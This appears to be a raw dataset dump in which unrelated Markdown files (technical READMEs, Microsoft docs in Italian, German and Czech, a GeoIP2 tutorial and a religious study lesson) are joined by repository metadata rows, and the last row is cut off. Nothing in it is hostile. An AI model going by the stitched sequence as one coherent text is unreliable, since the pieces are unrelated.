Sono state presentate informazioni dettagliate su come eseguire il training di un modello di rappresentazione distribuita delle parole usando l'algoritmo Word2Vec e quindi usare le rappresentazioni distribuite estratte come caratteristiche per il training di due modelli diversi per prevedere il punteggio del sentiment dei dati di testo di Twitter. Uno di questi modelli viene distribuito nel servizio contenitore di Azure (AKS).
## <a name="next-steps"></a>Passaggi successivi
Per iniziare, leggere altra documentazione sul [pacchetto di Azure Machine Learning per l'analisi del testo (AMLPTA)](https://docs.microsoft.com/python/api/overview/azure-machine-learning/textanalytics?view=azure-ml-py-latest) e sul [processo di data science per i team (TDSP)](https://aka.ms/tdsp).
## <a name="references"></a>Riferimenti
* [Team Data Science Process](https://docs.microsoft.com/azure/machine-learning/team-data-science-process/overview)
* [How to use Team Data Science Process (TDSP) in Azure Machine Learning](https://aka.ms/how-to-use-tdsp-in-aml) (Come usare Team Data Science Process, TDSP, in Azure Machine Learning)
* [TDSP project template for Azure Machine Learning](https://aka.ms/tdspamlgithubrepo) (Modello di progetto di TDSP per Azure Machine Learning)
* [Azure ML Workbench](https://docs.microsoft.com/azure/machine-learning/preview/)
* [Mikolov, Tomas, et al. Distributed representations of words and phrases and their compositionality. Advances in neural information processing systems. 2013.](https://arxiv.org/abs/1310.4546)
| 112.017094 | 563 | 0.810545 | ita_Latn | 0.989213 |
9a5921053c8ac906dd916ec9fbf5fc6b12b3253f | 1,101 | md | Markdown | README.md | vorth/electron-threejs-with-create-react-app | 6c2b6c95fe74d9d531299a44b1c35f4cae7f6d8a | [
"MIT"
] | 1 | 2018-04-04T07:59:00.000Z | 2018-04-04T07:59:00.000Z | README.md | vorth/electron-threejs-with-create-react-app | 6c2b6c95fe74d9d531299a44b1c35f4cae7f6d8a | [
"MIT"
] | null | null | null | README.md | vorth/electron-threejs-with-create-react-app | 6c2b6c95fe74d9d531299a44b1c35f4cae7f6d8a | [
"MIT"
] | null | null | null | # React, Three.js, and Electron
This is a fork of [electron-with-create-react-app](https://github.com/csepulv/electron-with-create-react-app). In this fork, I am integrating three.js in the form of [react-three-renderer-example](https://github.com/toxicFork/react-three-renderer-example).
I have removed some of the examples from the original `react-three-renderer-example`, to simplify things a bit.
To run the application:
npm install
npm start
## Provenance
This [post on freeCodeCamp](https://medium.freecodecamp.com/building-an-electron-application-with-create-react-app-97945861647c#.ze6c9qin1) illustrated using [Electron](https://electron.atom.io/) with [React](https://facebook.github.io/react/), taking advantage of `create-react-app`. I have merged some of the branches from the repo for that project.
The other major input was [react-three-renderer-example](https://github.com/toxicFork/react-three-renderer-example), which illustrates a very nice integration of [three.js](https://threejs.org/), the popular WebGL library, with [React](https://facebook.github.io/react/). | 68.8125 | 352 | 0.771117 | eng_Latn | 0.944274 |
9a59d0b06b217c195ad9b4fcde7a951aa64d0f12 | 1,809 | md | Markdown | src/en/2020-04-cq/05/01.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 68 | 2016-10-30T23:17:56.000Z | 2022-03-27T11:58:16.000Z | src/en/2020-04-cq/05/01.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 367 | 2016-10-21T03:50:22.000Z | 2022-03-28T23:35:25.000Z | src/en/2020-04-cq/05/01.md | PrJared/sabbath-school-lessons | 94a27f5bcba987a11a698e5e0d4279b81a68bc9a | [
"MIT"
] | 109 | 2016-08-02T14:32:13.000Z | 2022-03-31T10:18:41.000Z | ---
title: To Love More Than Self
date: 24/10/2020
---
#### inTro
Read This Week’s Passage: Luke 10:25–37
**To Love More Than Self**
The foundation of creation was love. Unlike the creator in other creation narratives from ancient texts, the God of the Bible did not create the world so He could be served; He created it because He is love. His love can be seen in every aspect of the creation story, but it is perhaps most powerfully expressed in the manner in which He created Adam and Eve and the purpose He instilled in them to achieve. Love is also the foundation of redemption. “God so loved the world, that He gave His only begotten Son, that whoever believes in Him should not perish but have everlasting life” (John 3:16). The story of redemption teaches us that God loved us more than He loved Himself.
Since love is the basis of creation and redemption, it is also the basis of real education. To love God with heart, mind, soul, and strength means that in the whole being, every aspect of development is to reach its highest attainment in unselfish love for God.
“Like the first is the second commandment, ‘Thou shalt love thy neighbor as thyself.’ Mark 12:31. The law of love calls for the devotion of body, mind, and soul to the service of God and humanity. This service, while making us a blessing to others, brings the greatest blessing to ourselves. Unselfishness underlies all true development. Through unselfish service we receive the highest culture of every faculty. More and more fully do we become partakers of the divine nature. We are fitted for heaven, for we receive heaven into our hearts” (Education, 16).
#### inScribe
Write out Luke 10:25–37 from the translation of your choice. You may also rewrite the passage in your own words, outline, or mind map the chapter.
`` | 82.227273 | 679 | 0.776119 | eng_Latn | 0.999907 |
9a5a03a997d10b3f64ce4db67dfd208ea2cc781d | 4,967 | md | Markdown | README.md | WineChord/chtho | f43c56a1c2faf83e5f48361ca1b06366ce061aab | [
"MIT"
] | null | null | null | README.md | WineChord/chtho | f43c56a1c2faf83e5f48361ca1b06366ce061aab | [
"MIT"
] | null | null | null | README.md | WineChord/chtho | f43c56a1c2faf83e5f48361ca1b06366ce061aab | [
"MIT"
] | null | null | null | # chtho
A TCP network library implemented in C++11.
## Quick Start
* Clone the code and build:
```
$ git clone https://github.com/WineChord/chtho.git
$ cd chtho
$ make
```
* Run the simple echo server and client examples:
```
$ ./build/bin/echoserver_test 5 # thread pool size (i.e. # of sub Reactors)
$ # inside another terminal
$ ./build/bin/echoclient_test 127.0.0.1 3 # server ip and number of clients
$ # then the message of 'hello' and 'world' will bump between
$ # client and server infinitely
```
## Modules
* time
* `Timestamp`: Provide basic utilities to provide current time and its conversions.
* `TimeZone`: Convert from Coordinated Universal Time to local time.
* logging
* `Logger` and `LogStream`: front end of the logging system, used directly by the user.
* `AsyncLogging`, `LogFile` and `FileUtil`: back end of the logging system, asynchronously flush the data to disk and conditionally roll the log.
* threading
* `MutexLock`, `MutexLockGuard`, `Condition` and `CountDownLatch`: encapsulated synchronization utilities.
* `Thread` and `ThreadPool`: thread utilities based on pthread
* timers
* `Timer` and `TimerID`: record timestamp and callback function.
* `TimerQueue`: add/remove timers and find expired timers using balanced binary tree.
* networking
* `Channel`: important abstraction provided for file descriptors and its relating events and corresponding callback functions.
* `EventLoop`: core class that demonstrates the Reactor pattern.
* `EventLoopThread`: encapsulates the eventloop in a thread, ensures 'one loop per thread'
* `EventLoopThreadPool`: starts a main eventloop thread acting as the main Reactor (usually used to monitor the listening socket) and a bunch of other eventloop
thread acting as the sub Reactors (usually used to monitor read/write events happened on the connecting sockets).
* poller:
`Poller`: base class providing the interface of polling, uses `Channel` to manage the events and callback functions of file descritpors.
`Poll`: An implementation of `Poller` using `poll(2)`.
`EPoll`: An implementation of `Poller` using `epoll(2)`, level-triggered.
* `Buffer`: used by `TcpConnection` to allow partial read/write.
* `TcpConnection`: manages read/write/close/error events happened on the connecting file descriptors, uses `Buffer` to read/write data.
* `Acceptor`: created in `TcpServer`, encapsulates the `socket`, `bind`, `listen` and `accept` steps. Inside `Acceptor::listen`, it will pass the connection socket file descriptor returned by `accept` to the new connection callback function provided by `TcpServer`. `TcpServer` finds a thread from thread pool for this new connection fd and creates a `TcpConnection` object. `TcpConnection` will register the connection channel (created upon connection fd) with the poller inside the eventloop which is dispatched eariler inside `TcpServer` and then starts to handle events happened on the connection channel (through the registed callback functions on the channel).
* `TcpServer`: encapsulates a `EventLoopThreadPool` and `Acceptor`. `Acceptor` will handle `socket`, `bind`, `listen` and `accept` steps. `TcpServer`'s main role is dispatch the new connections to threads inside eventloop thread pool. It also provides the connection callback and message callback interface to the user.
* `Connector`: works for `TcpClient`, encapsulates the `socket` and `connect` steps. Depending on the return value of `::connect`, it will use a channel to detect whether the connection socket is available for writing. If it is, this channel for the socket is removed and the socket file descriptor is passed to new conection callback function provided by `TcpClient`. `TcpClient` will use the socket file descriptor to create a new `TcpConnection`. Then the `TcpConnection` will handle the reading/writing event on the connection file descriptor. (the whole process is a little similar to `Acceptor`)
* `TcpClient`: encapsulates a `EventLoop` and `Connector`. Similar to `TcpServer`, it creates a new `TcpConnection` using the file descriptor provided by the `Connection`. It also provides the connection callback and message callback interface to the user.
* `InetAddr`: encapsulates Internet address.
* `Socket`: encapsulates socket related information.
development history: logger/logstream -> threading -> time/timer -> eventloop/thread/threadpool/poller/channel -> buffer/tcpconnection/acceptor/tcpserver -> connector/tcpclient -> logfile/asynclogging -> ???
## Documentation
* [logging](./docs/logging.md)
* [timer](./docs/TimerQueue.md)
* [channel](./docs/Channel.md)
* [eventloop](./docs/EventLoop.md)
* [poller](./docs/Poller.md)
* [RAII](./docs/RAII.md)
* [smartptr](./docs/smartpointers.md)
## TODO
- [ ] HTTP server
- [ ] protobuf
- [ ] protorpc
## License
MIT License
## Acknowledgement
This project learns _massively_ from [muduo](https://github.com/chenshuo/muduo). | 57.091954 | 668 | 0.754178 | eng_Latn | 0.989331 |
9a5a2d0f44d31eff4c3513ab3ca45b8f4142569e | 5,176 | md | Markdown | _posts/2020-07-20-get-ip-info.md | waittim/zekun.github.io | 87ca532136035cd1327090c7158ac40d6d7c1c24 | [
"MIT"
] | null | null | null | _posts/2020-07-20-get-ip-info.md | waittim/zekun.github.io | 87ca532136035cd1327090c7158ac40d6d7c1c24 | [
"MIT"
] | 29 | 2019-12-22T03:00:11.000Z | 2021-06-03T22:38:49.000Z | _posts/2020-07-20-get-ip-info.md | waittim/zekun.github.io | 87ca532136035cd1327090c7158ac40d6d7c1c24 | [
"MIT"
] | 1 | 2021-03-25T23:13:55.000Z | 2021-03-25T23:13:55.000Z | ---
layout: post
title: How to get information from IP address?
subtitle: Note - geoip2 module introduction
date: 2020-07-20
author: Zekun
header-img: img/post-python.jpg
catalog: true
tags:
- Feature Engineering
- Python
- IP
---
The process of getting IP address information is done based on [GeoIP2 Databases](https://www.maxmind.com/en/geoip2-databases). I Used the [MaxMind GeoIP2 Python API](https://geoip2.readthedocs.io/en/latest/) for IP information queries. The Github page for the API is [GeoIP2-python](https://github.com/maxmind/GeoIP2-python).
You need to download [GeoLite2-City.mmdb](https://github.com/waittim/waittim.github.io/raw/master/gallery/GeoLite2-City.mmdb) as data source and install **geoip2** module before you can use it.
For complete information, see [MaxMind - GeoIP2 Downloadable Databases](https://dev.maxmind.com/geoip/geoip2/downloadable/).
### Installation
```python
!pip install geoip2
# For Chinese user, you can choose tsinghua mirrors
#!pip install -i https://pypi.tuna.tsinghua.edu.cn/simple geoip2
```
### Usage
First, we should import the geoip2 module.
We are using the free downloaded data, therefore, please import *geoip2.database* .
```python
import geoip2.database
```
```python
ip = '129.59.93.0' # The IP of Vanderbilt Univeristy
reader = geoip2.database.Reader('GeoLite2-City.mmdb')
response = reader.city(ip)
reader.close()
```
all of the results were reserved in the *response*.
```python
response
```
```python
geoip2.models.City({'city': {'geoname_id': 4644585, 'names': {'de': 'Nashville', 'en': 'Nashville', 'es': 'Nashville', 'fr': 'Nashville', 'ja': 'ナッシュビル', 'pt-BR': 'Nashville', 'ru': 'Нашвилл', 'zh-CN': '纳什维尔'}}, 'continent': {'code': 'NA', 'geoname_id': 6255149, 'names': {'de': 'Nordamerika', 'en': 'North America', 'es': 'Norteamérica', 'fr': 'Amérique du Nord', 'ja': '北アメリカ', 'pt-BR': 'América do Norte', 'ru': 'Северная Америка', 'zh-CN': '北美洲'}}, 'country': {'geoname_id': 6252001, 'iso_code': 'US', 'names': {'de': 'USA', 'en': 'United States', 'es': 'Estados Unidos', 'fr': 'États-Unis', 'ja': 'アメリカ合衆国', 'pt-BR': 'Estados Unidos', 'ru': 'США', 'zh-CN': '美国'}}, 'location': {'accuracy_radius': 20, 'latitude': 36.066, 'longitude': -86.9659, 'metro_code': 659, 'time_zone': 'America/Chicago'}, 'postal': {'code': '37221'}, 'registered_country': {'geoname_id': 6252001, 'iso_code': 'US', 'names': {'de': 'USA', 'en': 'United States', 'es': 'Estados Unidos', 'fr': 'États-Unis', 'ja': 'アメリカ合衆国', 'pt-BR': 'Estados Unidos', 'ru': 'США', 'zh-CN': '美国'}}, 'subdivisions': [{'geoname_id': 4662168, 'iso_code': 'TN', 'names': {'en': 'Tennessee', 'es': 'Tennessee', 'fr': 'Tennessee', 'ja': 'テネシー州', 'pt-BR': 'Tenessi', 'ru': 'Теннесси', 'zh-CN': '田纳西州'}}], 'traits': {'ip_address': '129.59.93.0', 'prefix_len': 20}}, ['en'])
```
Let me re-format it to make it understandable.
```python
{'city':
{'geoname_id': 4644585,
'names': {'de': 'Nashville', 'en': 'Nashville', 'es': 'Nashville', 'fr': 'Nashville', 'ja': 'ナッシュビル', 'pt-BR': 'Nashville', 'ru': 'Нашвилл', 'zh-CN': '纳什维尔'}
},
'continent':
{'code': 'NA',
'geoname_id': 6255149,
'names': {'de': 'Nordamerika', 'en': 'North America', 'es': 'Norteamérica', 'fr': 'Amérique du Nord', 'ja': '北アメリカ', 'pt-BR': 'América do Norte', 'ru': 'Северная Америка', 'zh-CN': '北美洲'}
},
'country':
{'geoname_id': 6252001,
'iso_code': 'US',
'names': {'de': 'USA', 'en': 'United States', 'es': 'Estados Unidos', 'fr': 'États-Unis', 'ja': 'アメリカ合衆国', 'pt-BR': 'Estados Unidos', 'ru': 'США', 'zh-CN': '美国'}
},
'location':
{'accuracy_radius': 20,
'latitude': 36.066,
'longitude': -86.9659,
'metro_code': 659,
'time_zone': 'America/Chicago'
},
'postal':
{'code': '37221'},
'registered_country':
{'geoname_id': 6252001,
'iso_code': 'US',
'names': {'de': 'USA', 'en': 'United States', 'es': 'Estados Unidos', 'fr': 'États-Unis', 'ja': 'アメリカ合衆国', 'pt-BR': 'Estados Unidos', 'ru': 'США', 'zh-CN': '美国'}
},
'subdivisions':
[{'geoname_id': 4662168,
'iso_code': 'TN',
'names': {'en': 'Tennessee', 'es': 'Tennessee', 'fr': 'Tennessee', 'ja': 'テネシー州', 'pt-BR': 'Tenessi', 'ru': 'Теннесси', 'zh-CN': '田纳西州'}
}],
'traits': {'ip_address': '129.59.93.0', 'prefix_len': 20}
},
['en']
```
There are some example to use the *response*:
```python
response.country.iso_code
#'US'
```
```python
response.country.name
#'United States'
```
```python
response.country.names['zh-CN']
#'美国'
```
```python
response.subdivisions.most_specific.name
#'Tennessee'
```
```python
response.subdivisions.most_specific.iso_code
#'TN'
```
```python
response.city.name
#'Nashville'
```
```python
response.postal.code
#'37221'
```
```python
response.location.latitude
#36.066
```
```python
response.location.longitude
#-86.9659
```
```python
response.traits.network
#IPv4Network('129.59.80.0/20')
```
With this method, you can convert IP address information into actual address or latitude and longitude information, etc., for exploratory data analysis or modeling. | 29.078652 | 1,328 | 0.625966 | eng_Latn | 0.202462 |
9a5ad6e81fa507f6d68e801573e9f1672ed94dfa | 4,895 | md | Markdown | docs/framework/winforms/controls/how-to-change-the-appearance-of-the-windows-forms-tabcontrol.md | olifantix/docs.de-de | a31a14cdc3967b64f434a2055f7de6bf1bb3cda8 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/winforms/controls/how-to-change-the-appearance-of-the-windows-forms-tabcontrol.md | olifantix/docs.de-de | a31a14cdc3967b64f434a2055f7de6bf1bb3cda8 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/winforms/controls/how-to-change-the-appearance-of-the-windows-forms-tabcontrol.md | olifantix/docs.de-de | a31a14cdc3967b64f434a2055f7de6bf1bb3cda8 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 'Gewusst wie: Ändern der Darstellung der TabControl-Komponente in Windows Forms'
ms.date: 03/30/2017
dev_langs:
- csharp
- vb
- cpp
helpviewer_keywords:
- icons [Windows Forms], displaying on tabs
- TabControl control [Windows Forms], changing page appearance
- tabs [Windows Forms], controlling appearance
- buttons [Windows Forms], displaying tabs as
ms.assetid: 7c6cc443-ed62-4d26-b94d-b8913b44f773
ms.openlocfilehash: 1ea2208229d790f69e517d55e2de5ee042bdfb03
ms.sourcegitcommit: 3d5d33f384eeba41b2dff79d096f47ccc8d8f03d
ms.translationtype: MT
ms.contentlocale: de-DE
ms.lasthandoff: 05/04/2018
---
# <a name="how-to-change-the-appearance-of-the-windows-forms-tabcontrol"></a>Gewusst wie: Ändern der Darstellung der TabControl-Komponente in Windows Forms
Sie können die Darstellung der Registerkarten in Windows Forms mithilfe von Eigenschaften ändern die <xref:System.Windows.Forms.TabControl> und <xref:System.Windows.Forms.TabPage> Objekte, die die einzelnen Registerkarten des Steuerelements bilden. Durch Festlegen dieser Eigenschaften, können Sie Bilder auf Registerkarten anzeigen, Registerkarten vertikal anstatt horizontal anzuzeigen, mehrere Zeilen mit Registerkarten anzeigen und aktivieren oder deaktivieren Registerkarten programmgesteuert.
### <a name="to-display-an-icon-on-the-label-part-of-a-tab"></a>Ein Symbol auf dem Etikett Teil einer Registerkarte angezeigt.
1. Hinzufügen einer <xref:System.Windows.Forms.ImageList> Steuerelement dem Formular.
2. Hinzufügen von Bildern auf die Bildliste.
Weitere Informationen zu Bildlisten, finden Sie unter [ImageList-Komponente](../../../../docs/framework/winforms/controls/imagelist-component-windows-forms.md) und [wie: Hinzufügen oder Entfernen von Bildern mit der ImageList-Komponente in Windows Forms](../../../../docs/framework/winforms/controls/how-to-add-or-remove-images-with-the-windows-forms-imagelist-component.md).
3. Festlegen der <xref:System.Windows.Forms.TabControl.ImageList%2A> Eigenschaft von der <xref:System.Windows.Forms.TabControl> auf die <xref:System.Windows.Forms.ImageList> Steuerelement.
4. Legen Sie die <xref:System.Windows.Forms.TabPage.ImageIndex%2A> Eigenschaft von der <xref:System.Windows.Forms.TabPage> auf den Index des geeigneten Bildes in der Liste.
### <a name="to-create-multiple-rows-of-tabs"></a>So erstellen mehrere Zeilen mit Registerkarten
1. Fügen Sie die Anzahl der gewünschten Registerkarten hinzu.
2. Festlegen der <xref:System.Windows.Forms.TabControl.Multiline%2A> Eigenschaft von der <xref:System.Windows.Forms.TabControl> auf `true`.
3. Wenn die Registerkarten nicht bereits in mehreren Zeilen angezeigt werden, legen Sie die <xref:System.Windows.Forms.Control.Width%2A> Eigenschaft von der <xref:System.Windows.Forms.TabControl> enger gefasst als aller Registerkarten werden.
### <a name="to-arrange-tabs-on-the-side-of-the-control"></a>So ordnen Sie die Registerkarten auf das Steuerelement an
- Festlegen der <xref:System.Windows.Forms.TabControl.Alignment%2A> Eigenschaft von der <xref:System.Windows.Forms.TabControl> auf <xref:System.Windows.Forms.TabAlignment.Left> oder <xref:System.Windows.Forms.TabAlignment.Right>.
### <a name="to-programmatically-enable-or-disable-all-controls-on-a-tab"></a>Programmgesteuertes aktivieren oder deaktivieren alle Steuerelemente auf einer Registerkarte
1. Festlegen der <xref:System.Windows.Forms.TabPage.Enabled%2A> Eigenschaft von der <xref:System.Windows.Forms.TabPage> auf `true` oder `false`.
```vb
TabPage1.Enabled = False
```
```csharp
tabPage1.Enabled = false;
```
```cpp
tabPage1->Enabled = false;
```
### <a name="to-display-tabs-as-buttons"></a>Zum Anzeigen von Registerkarten als Schaltflächen
- Festlegen der <xref:System.Windows.Forms.TabControl.Appearance%2A> Eigenschaft von der <xref:System.Windows.Forms.TabControl> auf <xref:System.Windows.Forms.TabAppearance.Buttons> oder <xref:System.Windows.Forms.TabAppearance.FlatButtons>.
## <a name="see-also"></a>Siehe auch
[TabControl-Steuerelement](../../../../docs/framework/winforms/controls/tabcontrol-control-windows-forms.md)
[Übersicht über das TabControl-Steuerelement](../../../../docs/framework/winforms/controls/tabcontrol-control-overview-windows-forms.md)
[Gewusst wie: Hinzufügen eines Steuerelements zu einer Registerkarte](../../../../docs/framework/winforms/controls/how-to-add-a-control-to-a-tab-page.md)
[Gewusst wie: Deaktivieren von Registerkarten](../../../../docs/framework/winforms/controls/how-to-disable-tab-pages.md)
[Gewusst wie: Hinzufügen und Entfernen von Registerkarten mit dem TabControl-Steuerelement in Windows Forms](../../../../docs/framework/winforms/controls/how-to-add-and-remove-tabs-with-the-windows-forms-tabcontrol.md)
| 67.054795 | 500 | 0.763841 | deu_Latn | 0.753636 |
9a5b325b5f6b3c3e70f4c96daa3292d01488ef09 | 2,318 | md | Markdown | README.md | npmdoc/node-npmdoc-watchify | 634da8cda854501afd9a202d1555aa666b419edc | [
"MIT"
] | null | null | null | README.md | npmdoc/node-npmdoc-watchify | 634da8cda854501afd9a202d1555aa666b419edc | [
"MIT"
] | null | null | null | README.md | npmdoc/node-npmdoc-watchify | 634da8cda854501afd9a202d1555aa666b419edc | [
"MIT"
] | null | null | null | # npmdoc-watchify
#### api documentation for [watchify (v3.9.0)](https://github.com/substack/watchify) [](https://www.npmjs.org/package/npmdoc-watchify) [](https://travis-ci.org/npmdoc/node-npmdoc-watchify)
#### watch mode for browserify builds
[](https://www.npmjs.com/package/watchify)
- [https://npmdoc.github.io/node-npmdoc-watchify/build/apidoc.html](https://npmdoc.github.io/node-npmdoc-watchify/build/apidoc.html)
[](https://npmdoc.github.io/node-npmdoc-watchify/build/apidoc.html)


# package.json
```json
{
"name": "watchify",
"version": "3.9.0",
"description": "watch mode for browserify builds",
"main": "index.js",
"bin": "bin/cmd.js",
"dependencies": {
"anymatch": "^1.3.0",
"browserify": "^14.0.0",
"chokidar": "^1.0.0",
"defined": "^1.0.0",
"outpipe": "^1.1.0",
"through2": "^2.0.0",
"xtend": "^4.0.0"
},
"devDependencies": {
"brfs": "^1.0.1",
"mkdirp": "~0.5.1",
"split": "^1.0.0",
"tape": "^4.2.2",
"uglify-js": "^2.5.0",
"win-spawn": "^2.0.0"
},
"scripts": {
"test": "tape test/*.js"
},
"repository": {
"type": "git",
"url": "git://github.com/substack/watchify.git"
},
"homepage": "https://github.com/substack/watchify",
"keywords": [
"browserify",
"browserify-tool",
"watch",
"bundle",
"build",
"browser"
],
"author": {
"name": "James Halliday",
"url": "http://substack.net"
},
"license": "MIT"
}
```
# misc
- this document was created with [utility2](https://github.com/kaizhu256/node-utility2)
| 31.324324 | 360 | 0.609577 | yue_Hant | 0.181414 |
9a5b3e972dc0830aa74552f6521ce88272abcb32 | 969 | md | Markdown | README.md | kurikei/github-app-sandbox | 9ce2b78794b0ceb3e62d4814357066f9f266c453 | [
"MIT"
] | null | null | null | README.md | kurikei/github-app-sandbox | 9ce2b78794b0ceb3e62d4814357066f9f266c453 | [
"MIT"
] | null | null | null | README.md | kurikei/github-app-sandbox | 9ce2b78794b0ceb3e62d4814357066f9f266c453 | [
"MIT"
] | null | null | null | # Code Climate
[](https://codeclimate.com/github/kurikei/github-app-sandbox/maintainability)
[](https://codeclimate.com/github/kurikei/github-app-sandbox/test_coverage)
# shields.io



# waffle.io
[](https://waffle.io/kurikei/github-app-sandbox/metrics/throughput)
[](https://waffle.io/kurikei/github-app-sandbox)
| 64.6 | 171 | 0.789474 | yue_Hant | 0.442504 |
9a5c2c0c6e44a85bbe189b05b5084fb88c07ca5c | 1,409 | md | Markdown | docs/debugger/debug-interface-access/idiasectioncontrib-get-code16bit.md | tommorris/visualstudio-docs.cs-cz | 92c436dbc75020bc5121cc2c9e4976f62c9b13ca | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/debugger/debug-interface-access/idiasectioncontrib-get-code16bit.md | tommorris/visualstudio-docs.cs-cz | 92c436dbc75020bc5121cc2c9e4976f62c9b13ca | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/debugger/debug-interface-access/idiasectioncontrib-get-code16bit.md | tommorris/visualstudio-docs.cs-cz | 92c436dbc75020bc5121cc2c9e4976f62c9b13ca | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Idiasectioncontrib::get_code16bit – | Microsoft Docs
ms.custom: ''
ms.date: 11/04/2016
ms.technology: vs-ide-debug
ms.topic: conceptual
dev_langs:
- C++
helpviewer_keywords:
- IDiaSectionContrib::get_code16bit method
ms.assetid: 8cde8fc5-9546-4f82-b4a8-afd0d835039e
author: mikejo5000
ms.author: mikejo
manager: douge
ms.workload:
- multiple
ms.openlocfilehash: e253b440712a26b67870f76b241a85f5979158b3
ms.sourcegitcommit: 3d10b93eb5b326639f3e5c19b9e6a8d1ba078de1
ms.translationtype: MT
ms.contentlocale: cs-CZ
ms.lasthandoff: 04/18/2018
ms.locfileid: "31467141"
---
# <a name="idiasectioncontribgetcode16bit"></a>IDiaSectionContrib::get_code16bit
Získá příznak označující, zda oddíl obsahuje kód 16 bitů.
## <a name="syntax"></a>Syntaxe
```C++
HRESULT get_code16bit(
BOOL *pRetVal
};
```
#### <a name="parameters"></a>Parametry
`pRetVal`
[out] Vrátí `TRUE` Pokud je kód v části 16bitové; jinak hodnota, vrátí `FALSE`.
## <a name="return-value"></a>Návratová hodnota
V případě úspěchu vrátí `S_OK`, jinak vrátí kód chyby.
## <a name="remarks"></a>Poznámky
Tato metoda znamená pouze to, pokud kód je 16 bitů. Pokud je kód není 16bitové, může být cokoliv jiného, například kód 32bitové nebo 64bitové verze.
## <a name="see-also"></a>Viz také
[IDiaSectionContrib](../../debugger/debug-interface-access/idiasectioncontrib.md) | 30.630435 | 151 | 0.727466 | ces_Latn | 0.895663 |
9a5c505e93e6137492a1062978ef08c1528c142e | 2,381 | md | Markdown | README.md | vedraj360/V-Crypt_Password_Manager | 99cf439b99479edd6ba48b9de96a9596cccbfe86 | [
"MIT"
] | 1 | 2020-11-30T11:37:17.000Z | 2020-11-30T11:37:17.000Z | README.md | vedraj360/V-Crypt_Password_Manager | 99cf439b99479edd6ba48b9de96a9596cccbfe86 | [
"MIT"
] | null | null | null | README.md | vedraj360/V-Crypt_Password_Manager | 99cf439b99479edd6ba48b9de96a9596cccbfe86 | [
"MIT"
] | null | null | null | # V-Crypt Password Manager 🔑✔❤
Super secure password manager which stores passwords using AES-256 bit encryption and using AWS as backend for storing data and endpoints developed using API Gateway.
Currently I am using this as my password manager and is in Close beta on google play. If you have suggested, then mail me at vedraj.developer@gmail.com and the contribution is always welcomed.
## Screenshots
## Splash Screen
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/Splash-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/splash-L.png" width="300" hspace="60"/>
</p>
## Login / Signup
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/Login-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/Login-L.png" width="300" hspace="40"/>
</p>
## Vault
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/Vault-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/Vault-L.png" width="300" hspace="40"/>
</p>
## Add Password
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/ADP-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/ADP-L.png" width="300" hspace="40"/>
</p>
## Update Password
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/UPD-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/UPD-L.png" width="300" hspace="40"/>
</p>
## Password Length
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/PS-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/PS-L.png" width="300" hspace="40"/>
</p>
| 46.686275 | 192 | 0.745065 | kor_Hang | 0.178059 |
9a5c6e28667a0226ac25002417ce5b92b2f697f1 | 1,296 | md | Markdown | README.md | adijha/Node_Blog_App | b4acae6c27085d90662b713d58da6cac9010c850 | [
"MIT"
] | 1 | 2019-06-19T02:44:48.000Z | 2019-06-19T02:44:48.000Z | README.md | AdityaKumarJha/Node_Blog_App | b4acae6c27085d90662b713d58da6cac9010c850 | [
"MIT"
] | 1 | 2019-06-19T02:45:37.000Z | 2019-06-23T01:55:19.000Z | README.md | AdityaKumarJha/Bootstrap_Theme_Blog_App | b4acae6c27085d90662b713d58da6cac9010c850 | [
"MIT"
] | null | null | null | # A node js blog app
[](https://mrjha.online/projects/node_blog)
An opensource templete for blog made on node.js :)
You can read about [this blog on my website][mrjha] as well as in the following article:
[How To make a blog web app on node js][omniworld]
## If You Are Submitting Bugs or Issues
Verify that the node version you are using is a _stable_ version of npm and node modules.
If you are on a stable version of node, please provide a sufficient code for issues.
## Version Compatibility
Works with all stable versions of Node and npm.
## Dependencies
* NodeJS
* express
* mongo-connect
* mongodb
* express-session
* nodemon (good to have)
* becrypt js
* body parser
* mongoose
* express file-upload
#### Expected Updates
Here we are not using any front end framework,
So I am planning to use React.js.
### ENV
make env for storing confedencial data, like API keys or mongoURI.
## Testing
If you create a pull request :)
```
npm install
npm test
```
## Contributors
* [Samrat Saurav Jaiswal][samrat]
## License
The license is stated in the LICENSE file.
[mrjha]:https://mrjha.online
[AdityaKumarJha]:https://github.com/AdityaKumarJha
[Samrat]:https://github.com/samratsauravjaiswal
[omniworld]:https://omniworld.com/node_blog
| 19.938462 | 89 | 0.740741 | eng_Latn | 0.909353 |
9a5c992ef76a502e2b16436388b30a4132e5cf76 | 3,066 | md | Markdown | _posts/2017-10-21-Router-Switch.md | WhataNerb/WhataNerb.github.io | 7a75aa35c05b74b6babbd02118033f9434e76d67 | [
"MIT"
